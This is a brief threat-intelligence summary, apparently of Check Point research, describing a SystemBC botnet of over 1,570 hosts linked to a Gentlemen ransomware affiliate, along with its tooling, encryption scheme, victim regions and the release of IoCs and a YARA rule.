Check Point researchers uncovered a SystemBC botnet of more than 1,570 infected hosts tied to a Gentlemen ransomware affiliate that used the proxy for covert payload delivery. The Gentlemen RaaS, active since mid‑2025 with Go and C lockers (including an ESXi variant), employs a human‑operated toolkit—Cobalt Strike, Mimikatz and GPO propagation—and a hybrid X25519/XChaCha20 encryption scheme. #SystemBC #GentlemenRansomware
Keypoints
- Check Point identified a SystemBC botnet of over 1,570 hosts associated with a Gentlemen ransomware affiliate.
- Gentlemen RaaS provides Go-based lockers for Windows, Linux, NAS and BSD and a C-based encryptor for ESXi systems.
- Attackers gained control from a Domain Controller with Domain Admin rights and deployed Cobalt Strike after harvesting credentials with Mimikatz.
- Gentlemen uses X25519 and XChaCha20 with ephemeral per-file keys, fully encrypting small files and selectively encrypting chunks of large files.
- Victims are mainly in the US, UK, Germany, Australia and Romania, and Check Point released IoCs and a YARA rule to aid defenders.